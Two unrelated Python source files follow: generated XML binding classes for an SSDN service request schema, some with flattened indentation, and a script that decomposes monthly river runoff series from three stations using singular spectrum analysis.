self.InscriptionCode = InscriptionCode
def get_PhaseCode(self):
return self.PhaseCode
def set_PhaseCode(self, PhaseCode):
self.PhaseCode = PhaseCode
def export(self, outfile, level, namespace_='', name_='InscriptionType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='InscriptionType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='InscriptionType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='InscriptionType', fromsubclass_=False):
if self.SSIN is not None:
showIndent(outfile, level)
outfile.write('<%sSSIN>%s</%sSSIN>\n' %
(namespace_, self.gds_format_string(quote_xml(self.SSIN).encode(ExternalEncoding), input_name='SSIN'), namespace_))
if self.OrgUnit is not None:
showIndent(outfile, level)
outfile.write('<%sOrgUnit>%s</%sOrgUnit>\n' %
(namespace_, self.gds_format_string(quote_xml(self.OrgUnit).encode(ExternalEncoding), input_name='OrgUnit'), namespace_))
if self.Purpose is not None:
showIndent(outfile, level)
outfile.write('<%sPurpose>%s</%sPurpose>\n' %
(namespace_, self.gds_format_integer(self.Purpose, input_name='Purpose'), namespace_))
if self.Period:
self.Period.export(outfile, level, namespace_, name_='Period')
if self.InscriptionCode is not None:
showIndent(outfile, level)
outfile.write('<%sInscriptionCode>%s</%sInscriptionCode>\n' %
(namespace_, self.gds_format_integer(self.InscriptionCode, input_name='InscriptionCode'), namespace_))
if self.PhaseCode is not None:
showIndent(outfile, level)
outfile.write('<%sPhaseCode>%s</%sPhaseCode>\n' %
(namespace_, self.gds_format_integer(self.PhaseCode, input_name='PhaseCode'), namespace_))
def hasContent_(self):
if (
self.SSIN is not None or
self.OrgUnit is not None or
self.Purpose is not None or
self.Period is not None or
self.InscriptionCode is not None or
self.PhaseCode is not None
):
return True
else:
return False
    def exportLiteral(self, outfile, level, name_='InscriptionType'):
        """Write this object as a Python constructor-literal snippet."""
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # No XML attributes on InscriptionType; hook kept for subclasses.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        """Write each set child as a `name=value,` line of Python-literal output."""
        if self.SSIN is not None:
            showIndent(outfile, level)
            outfile.write('SSIN=%s,\n' %
                          quote_python(self.SSIN).encode(ExternalEncoding))
        if self.OrgUnit is not None:
            showIndent(outfile, level)
            outfile.write('OrgUnit=%s,\n' %
                          quote_python(self.OrgUnit).encode(ExternalEncoding))
        if self.Purpose is not None:
            showIndent(outfile, level)
            outfile.write('Purpose=%d,\n' % self.Purpose)
        if self.Period is not None:
            # Nested object: emitted as a model_.PeriodType(...) constructor.
            showIndent(outfile, level)
            outfile.write('Period=model_.PeriodType(\n')
            self.Period.exportLiteral(outfile, level, name_='Period')
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.InscriptionCode is not None:
            showIndent(outfile, level)
            outfile.write('InscriptionCode=%d,\n' % self.InscriptionCode)
        if self.PhaseCode is not None:
            showIndent(outfile, level)
            outfile.write('PhaseCode=%d,\n' % self.PhaseCode)
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        # InscriptionType has no attributes to parse; hook kept for subclasses.
        pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'SSIN':
SSIN_ = child_.text
SSIN_ = self.gds_validate_string(SSIN_, node, 'SSIN')
self.SSIN = SSIN_
self.validate_t_SSIN(self.SSIN) # validate type t_SSIN
elif nodeName_ == 'OrgUnit':
OrgUnit_ = child_.text
OrgUnit_ = self.gds_validate_string(OrgUnit_, node, 'OrgUnit')
self.OrgUnit = OrgUnit_
elif nodeName_ == 'Purpose':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'Purpose')
self.Purpose = ival_
elif nodeName_ == 'Period':
obj_ = PeriodType.factory()
obj_.build(child_)
self.set_Period(obj_)
elif nodeName_ == 'InscriptionCode':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscriptionCode')
self.InscriptionCode = ival_
elif nodeName_ == 'PhaseCode':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'PhaseCode')
self.PhaseCode = ival_
# end class InscriptionType
class DescriptionType(GeneratedsSuper):
    """Generated binding for a localized free-text description element.

    Simple-content style: the element text is held in ``valueOf_`` and an
    optional ``lang`` attribute identifies the language.
    """
    subclass = None
    superclass = None
    def __init__(self, lang=None, valueOf_=None):
        # lang: optional language attribute; valueOf_: the element's text.
        self.lang = _cast(None, lang)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if DescriptionType.subclass:
            return DescriptionType.subclass(*args_, **kwargs_)
        else:
            return DescriptionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_lang(self):
        return self.lang
    def set_lang(self, lang):
        self.lang = lang
    def validate_t_Language(self, value):
        # Validate type t_Language, a restriction on xs:string.
        pass
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def export(self, outfile, level, namespace_='', name_='DescriptionType', namespacedef_=''):
        """Serialize as XML; text content is emitted inline (no newline after '>')."""
        showIndent(outfile, level)
        outfile.write('<%s%s%s' %
                      (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed,
                              namespace_, name_='DescriptionType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_, name_)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')
    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='DescriptionType'):
        if self.lang is not None and 'lang' not in already_processed:
            already_processed.append('lang')
            outfile.write(' lang=%s' % (quote_attrib(self.lang), ))
    def exportChildren(self, outfile, level, namespace_='', name_='DescriptionType', fromsubclass_=False):
        # Simple-content element: no child elements.
        pass
    def hasContent_(self):
        # Truthiness check: empty-string text counts as "no content".
        if (
            self.valueOf_
        ):
            return True
        else:
            return False
    def exportLiteral(self, outfile, level, name_='DescriptionType'):
        # valueOf_ is written unconditionally, outside the hasContent_()
        # guard — standard generateDS layout for simple-content types.
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.lang is not None and 'lang' not in already_processed:
            already_processed.append('lang')
            showIndent(outfile, level)
            outfile.write('lang = "%s",\n' % (self.lang,))
    def exportLiteralChildren(self, outfile, level, name_):
        pass
    def build(self, node):
        """Populate from a parsed element: attributes, then all text content."""
        self.buildAttributes(node, node.attrib, [])
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('lang', node)
        if value is not None and 'lang' not in already_processed:
            already_processed.append('lang')
            self.lang = value
            self.validate_t_Language(self.lang)  # validate type t_Language
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class DescriptionType
class PeriodType(GeneratedsSuper):
    """A period of time between a startdate and an enddate."""

    subclass = None
    superclass = None

    # (tag, attribute) pairs drive the serialization loops below; the tuple
    # order fixes the XML child order.
    def __init__(self, StartDate=None, EndDate=None):
        self.StartDate = StartDate
        self.EndDate = EndDate

    @staticmethod
    def factory(*args_, **kwargs_):
        cls = PeriodType.subclass or PeriodType
        return cls(*args_, **kwargs_)

    def get_StartDate(self):
        return self.StartDate

    def set_StartDate(self, StartDate):
        self.StartDate = StartDate

    def get_EndDate(self):
        return self.EndDate

    def set_EndDate(self, EndDate):
        self.EndDate = EndDate

    def export(self, outfile, level, namespace_='', name_='PeriodType', namespacedef_=''):
        """Serialize this period as an XML element to *outfile*."""
        showIndent(outfile, level)
        extra = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='PeriodType')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        showIndent(outfile, level)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='PeriodType'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='PeriodType', fromsubclass_=False):
        for tag, value in (('StartDate', self.StartDate), ('EndDate', self.EndDate)):
            if value is None:
                continue
            showIndent(outfile, level)
            text = self.gds_format_string(
                quote_xml(value).encode(ExternalEncoding), input_name=tag)
            outfile.write('<%s%s>%s</%s%s>\n' %
                          (namespace_, tag, text, namespace_, tag))

    def hasContent_(self):
        return self.StartDate is not None or self.EndDate is not None

    def exportLiteral(self, outfile, level, name_='PeriodType'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        for tag, value in (('StartDate', self.StartDate), ('EndDate', self.EndDate)):
            if value is not None:
                showIndent(outfile, level)
                outfile.write('%s=%s,\n' %
                              (tag, quote_python(value).encode(ExternalEncoding)))

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            self.buildChildren(child, node,
                               Tag_pattern_.match(child.tag).groups()[-1])

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ in ('StartDate', 'EndDate'):
            value = self.gds_validate_string(child_.text, node, nodeName_)
            setattr(self, nodeName_, value)
# end class PeriodType
class StartDate(GeneratedsSuper):
    """Generated placeholder element: no attributes and no children."""

    subclass = None
    superclass = None

    def __init__(self):
        pass

    @staticmethod
    def factory(*args_, **kwargs_):
        cls = StartDate.subclass or StartDate
        return cls(*args_, **kwargs_)

    def export(self, outfile, level, namespace_='', name_='StartDate', namespacedef_=''):
        showIndent(outfile, level)
        extra = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='StartDate')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            # Always taken: the element has no content model.
            outfile.write('/>\n')

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='StartDate'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='StartDate', fromsubclass_=False):
        pass

    def hasContent_(self):
        # Empty content model: nothing can ever be set.
        return False

    def exportLiteral(self, outfile, level, name_='StartDate'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            self.buildChildren(child, node,
                               Tag_pattern_.match(child.tag).groups()[-1])

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class StartDate
class EndDate(GeneratedsSuper):
    """Generated placeholder element: no attributes and no children."""

    subclass = None
    superclass = None

    def __init__(self):
        pass

    @staticmethod
    def factory(*args_, **kwargs_):
        cls = EndDate.subclass or EndDate
        return cls(*args_, **kwargs_)

    def export(self, outfile, level, namespace_='', name_='EndDate', namespacedef_=''):
        showIndent(outfile, level)
        extra = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='EndDate')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            # Always taken: the element has no content model.
            outfile.write('/>\n')

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='EndDate'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='EndDate', fromsubclass_=False):
        pass

    def hasContent_(self):
        # Empty content model: nothing can ever be set.
        return False

    def exportLiteral(self, outfile, level, name_='EndDate'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            self.buildChildren(child, node,
                               Tag_pattern_.match(child.tag).groups()[-1])

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class EndDate
class ClosedPeriodType(GeneratedsSuper):
    """A closed period with a mandatory start and end date."""

    subclass = None
    superclass = None

    def __init__(self, StartDate=None, EndDate=None):
        self.StartDate = StartDate
        self.EndDate = EndDate

    @staticmethod
    def factory(*args_, **kwargs_):
        cls = ClosedPeriodType.subclass or ClosedPeriodType
        return cls(*args_, **kwargs_)

    def get_StartDate(self):
        return self.StartDate

    def set_StartDate(self, StartDate):
        self.StartDate = StartDate

    def get_EndDate(self):
        return self.EndDate

    def set_EndDate(self, EndDate):
        self.EndDate = EndDate

    def export(self, outfile, level, namespace_='', name_='ClosedPeriodType', namespacedef_=''):
        """Serialize this period as an XML element to *outfile*."""
        showIndent(outfile, level)
        extra = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='ClosedPeriodType')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        showIndent(outfile, level)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ClosedPeriodType'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='ClosedPeriodType', fromsubclass_=False):
        for tag, value in (('StartDate', self.StartDate), ('EndDate', self.EndDate)):
            if value is None:
                continue
            showIndent(outfile, level)
            text = self.gds_format_string(
                quote_xml(value).encode(ExternalEncoding), input_name=tag)
            outfile.write('<%s%s>%s</%s%s>\n' %
                          (namespace_, tag, text, namespace_, tag))

    def hasContent_(self):
        return self.StartDate is not None or self.EndDate is not None

    def exportLiteral(self, outfile, level, name_='ClosedPeriodType'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        for tag, value in (('StartDate', self.StartDate), ('EndDate', self.EndDate)):
            if value is not None:
                showIndent(outfile, level)
                outfile.write('%s=%s,\n' %
                              (tag, quote_python(value).encode(ExternalEncoding)))

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            self.buildChildren(child, node,
                               Tag_pattern_.match(child.tag).groups()[-1])

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ in ('StartDate', 'EndDate'):
            value = self.gds_validate_string(child_.text, node, nodeName_)
            setattr(self, nodeName_, value)
# end class ClosedPeriodType
class StartingPeriodType(GeneratedsSuper):
    """A halfopen period with a mandatory start date."""

    subclass = None
    superclass = None

    def __init__(self, StartDate=None, EndDate=None):
        self.StartDate = StartDate
        self.EndDate = EndDate

    @staticmethod
    def factory(*args_, **kwargs_):
        cls = StartingPeriodType.subclass or StartingPeriodType
        return cls(*args_, **kwargs_)

    def get_StartDate(self):
        return self.StartDate

    def set_StartDate(self, StartDate):
        self.StartDate = StartDate

    def get_EndDate(self):
        return self.EndDate

    def set_EndDate(self, EndDate):
        self.EndDate = EndDate

    def export(self, outfile, level, namespace_='', name_='StartingPeriodType', namespacedef_=''):
        """Serialize this period as an XML element to *outfile*."""
        showIndent(outfile, level)
        extra = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='StartingPeriodType')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        showIndent(outfile, level)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='StartingPeriodType'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='StartingPeriodType', fromsubclass_=False):
        for tag, value in (('StartDate', self.StartDate), ('EndDate', self.EndDate)):
            if value is None:
                continue
            showIndent(outfile, level)
            text = self.gds_format_string(
                quote_xml(value).encode(ExternalEncoding), input_name=tag)
            outfile.write('<%s%s>%s</%s%s>\n' %
                          (namespace_, tag, text, namespace_, tag))

    def hasContent_(self):
        return self.StartDate is not None or self.EndDate is not None

    def exportLiteral(self, outfile, level, name_='StartingPeriodType'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        for tag, value in (('StartDate', self.StartDate), ('EndDate', self.EndDate)):
            if value is not None:
                showIndent(outfile, level)
                outfile.write('%s=%s,\n' %
                              (tag, quote_python(value).encode(ExternalEncoding)))

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            self.buildChildren(child, node,
                               Tag_pattern_.match(child.tag).groups()[-1])

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ in ('StartDate', 'EndDate'):
            value = self.gds_validate_string(child_.text, node, nodeName_)
            setattr(self, nodeName_, value)
# end class StartingPeriodType
class EndingPeriodType(GeneratedsSuper):
    """A halfopen period with a mandatory end date."""

    subclass = None
    superclass = None

    def __init__(self, StartDate=None, EndDate=None):
        self.StartDate = StartDate
        self.EndDate = EndDate

    @staticmethod
    def factory(*args_, **kwargs_):
        cls = EndingPeriodType.subclass or EndingPeriodType
        return cls(*args_, **kwargs_)

    def get_StartDate(self):
        return self.StartDate

    def set_StartDate(self, StartDate):
        self.StartDate = StartDate

    def get_EndDate(self):
        return self.EndDate

    def set_EndDate(self, EndDate):
        self.EndDate = EndDate

    def export(self, outfile, level, namespace_='', name_='EndingPeriodType', namespacedef_=''):
        """Serialize this period as an XML element to *outfile*."""
        showIndent(outfile, level)
        extra = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='EndingPeriodType')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        showIndent(outfile, level)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='EndingPeriodType'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='EndingPeriodType', fromsubclass_=False):
        for tag, value in (('StartDate', self.StartDate), ('EndDate', self.EndDate)):
            if value is None:
                continue
            showIndent(outfile, level)
            text = self.gds_format_string(
                quote_xml(value).encode(ExternalEncoding), input_name=tag)
            outfile.write('<%s%s>%s</%s%s>\n' %
                          (namespace_, tag, text, namespace_, tag))

    def hasContent_(self):
        return self.StartDate is not None or self.EndDate is not None

    def exportLiteral(self, outfile, level, name_='EndingPeriodType'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        for tag, value in (('StartDate', self.StartDate), ('EndDate', self.EndDate)):
            if value is not None:
                showIndent(outfile, level)
                outfile.write('%s=%s,\n' %
                              (tag, quote_python(value).encode(ExternalEncoding)))

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            self.buildChildren(child, node,
                               Tag_pattern_.match(child.tag).groups()[-1])

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ in ('StartDate', 'EndDate'):
            value = self.gds_validate_string(child_.text, node, nodeName_)
            setattr(self, nodeName_, value)
# end class EndingPeriodType
class ExtensionPlaceHolder(GeneratedsSuper):
    """The sole purpose of this element is to provide a place to initialize
    the usage of xjc extensions in."""

    subclass = None
    superclass = None

    def __init__(self):
        pass

    @staticmethod
    def factory(*args_, **kwargs_):
        cls = ExtensionPlaceHolder.subclass or ExtensionPlaceHolder
        return cls(*args_, **kwargs_)

    def export(self, outfile, level, namespace_='', name_='ExtensionPlaceHolder', namespacedef_=''):
        showIndent(outfile, level)
        extra = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='ExtensionPlaceHolder')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            # Always taken: the element has no content model.
            outfile.write('/>\n')

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ExtensionPlaceHolder'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='ExtensionPlaceHolder', fromsubclass_=False):
        pass

    def hasContent_(self):
        # Empty content model: nothing can ever be set.
        return False

    def exportLiteral(self, outfile, level, name_='ExtensionPlaceHolder'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            self.buildChildren(child, node,
                               Tag_pattern_.match(child.tag).groups()[-1])

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class ExtensionPlaceHolder
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""


def usage():
    """Print the usage help and exit with status 1.

    Uses sys.stdout.write (like parse()/parseLiteral() below) instead of
    the Python-2-only ``print`` statement, keeping the module's output
    style consistent and this function forward-compatible.
    """
    sys.stdout.write(USAGE_TEXT + '\n')
    sys.exit(1)
def get_root_tag(node):
    """Return (tag, bound class) for *node*; the class is None when no
    class in this module matches the tag."""
    tag = Tag_pattern_.match(node.tag).groups()[-1]
    return tag, globals().get(tag)
def parse(inFileName):
    """Parse an XML file, echo it to stdout as XML, and return the root object.

    Falls back to ServiceRequestType when the root element's tag does not
    match any class defined in this module.
    """
    doc = parsexml_(inFileName)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        rootTag = 'ServiceRequestType'
        rootClass = ServiceRequestType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    sys.stdout.write('<?xml version="1.0" ?>\n')
    rootObj.export(sys.stdout, 0, name_=rootTag,
                   namespacedef_='')
    return rootObj
def parseString(inString):
    """Parse an XML document held in a string, echo it to stdout, and
    return the built root object.

    Falls back to ServiceRequestType when the root element's tag does not
    match any class defined in this module.
    """
    from StringIO import StringIO
    doc = parsexml_(StringIO(inString))
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        rootTag = 'ServiceRequestType'
        rootClass = ServiceRequestType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    sys.stdout.write('<?xml version="1.0" ?>\n')
    # Consistency fix: export under the *detected* root tag, as parse()
    # does, instead of always hardcoding "ServiceRequestType".
    rootObj.export(sys.stdout, 0, name_=rootTag,
                   namespacedef_='')
    return rootObj
def parseLiteral(inFileName):
    """Parse an XML file and emit it to stdout as a Python-literal module.

    Returns the built root object.
    """
    doc = parsexml_(inFileName)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        rootTag = 'ServiceRequestType'
        rootClass = ServiceRequestType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    sys.stdout.write('#from SSDNRequest import *\n\n')
    sys.stdout.write('import SSDNRequest as model_\n\n')
    # Bug fix: interpolate the detected root tag.  The previous code wrote
    # the literal text "model_.rootTag(", producing invalid generated code.
    sys.stdout.write('rootObj = model_.%s(\n' % rootTag)
    rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
    sys.stdout.write(')\n')
    return rootObj
def main():
    """Command-line entry point: parse the single XML-file argument."""
    args = sys.argv[1:]
    if len(args) != 1:
        usage()  # prints help and exits with status 1
    parse(args[0])


if __name__ == '__main__':
    #import pdb; pdb.set_trace()
    main()
# Public API of this generated module (controls ``from <module> import *``).
__all__ = [
    "AuthorCodeList",
    "AuthorizedUserType",
    "ClosedPeriodType",
    "DescriptionType",
    "DetailMessageType",
    "Diagnostic",
    "EndDate",
    "EndingPeriodType",
    "ExtensionPlaceHolder",
    "FieldName",
    "FieldValue",
    "InformationType",
    "InscriptionType",
    "PeriodType",
    "ReasonCode",
    "RequestContextType",
    "RequestMessageType",
    "ResultSummary",
    "ReturnCode",
    "SSDNRequest",
    "ServiceRequestType",
    "StartDate",
    "StartingPeriodType",
    "Version"
]
|
#%%
import numpy as np
from numpy import pi
import pandas as pd
import matplotlib.pyplot as plt
import os
root_path = os.path.dirname(os.path.abspath('__file__'))
import sys
sys.path.append(root_path+'/config/')
from variables import train_len, dev_len,test_len
from ssa import SSA
# Station under study and per-station output directories.
station = 'Huaxian'  # 'Huaxian', 'Xianyang' and 'Zhangjiashan'
save_path = {
    'Huaxian': root_path + '\\Huaxian_ssa\\data\\',
    'Xianyang': root_path + '\\Xianyang_ssa\\data\\',
    'Zhangjiashan': root_path + '\\Zhangjiashan_ssa\\data\\',
}
# Monthly runoff series per station.  The first 24 months are dropped for
# Huaxian and Xianyang (files start in 1951) so every series starts 1953/01;
# Zhangjiashan's file already starts in 1953 (slice [0:] is a no-op).
data = {
    'Huaxian': (pd.read_excel(root_path+'/time_series/HuaxianRunoff1951-2018(1953-2018).xlsx')['MonthlyRunoff'][24:]).reset_index(drop=True),
    'Xianyang': (pd.read_excel(root_path+'/time_series/XianyangRunoff1951-2018(1953-2018).xlsx')['MonthlyRunoff'][24:]).reset_index(drop=True),
    'Zhangjiashan': (pd.read_excel(root_path+'/time_series/ZhangJiaShanRunoff1953-2018(1953-2018).xlsx')['MonthlyRunoff'][0:]).reset_index(drop=True),
}
# Make sure the per-sample test output directory exists.
if not os.path.exists(save_path[station]+'ssa-test\\'):
    os.makedirs(save_path[station]+'ssa-test\\')
# Plot the monthly runoff of the selected station.
# NOTE(review): the xlabel says 2008/12 but the series runs to 2018/12 —
# confirm which range is intended.
data[station].plot()
plt.title("Monthly Runoff of "+station+" station")
plt.xlabel("Time(1953/01-2008/12)")
plt.ylabel(r"Runoff($m^3/s$)")
plt.tight_layout()
plt.show()
# Train / train+dev splits (lengths come from config/variables.py).
full = data[station]  # (full) from 1953/01 to 2018/12, 792 samples
train = full[:train_len]  # (train) from 1953/01 to 1998/12, 552 samples
train_dev = full[:train_len+dev_len]
# SSA decomposition parameters: embedding window and output column names
# (original series plus the 12 reconstructed components).
window = 12
columns = [
    'ORIG',        # orig_TS
    'Trend',       # F0
    'Periodic1',   # F1
    'Periodic2',   # F2
    'Periodic3',   # F3
    'Periodic4',   # F4
    'Periodic5',   # F5
    'Periodic6',   # F6
    'Periodic7',   # F7
    'Periodic8',   # F8
    'Periodic9',   # F9
    'Periodic10',  # F10
    'Noise',       # F11
]
#%%
def _ssa_decompose_to_csv(series, out_file):
    """SSA-decompose *series* and write it to *out_file* as CSV.

    Columns are the original series followed by the 12 reconstructed
    components (trend, periodic 1-10, noise), matching ``columns`` order.
    """
    ssa = SSA(series, window)
    parts = [ssa.orig_TS] + [ssa.reconstruct(i) for i in range(12)]
    frame = pd.concat(parts, axis=1)
    frame = pd.DataFrame(frame.values, columns=columns)
    frame.to_csv(out_file, index=None)


# Decompose the entire monthly runoff series.
_ssa_decompose_to_csv(full, save_path[station]+'SSA_FULL.csv')
#%%
# Decompose the training subset only.
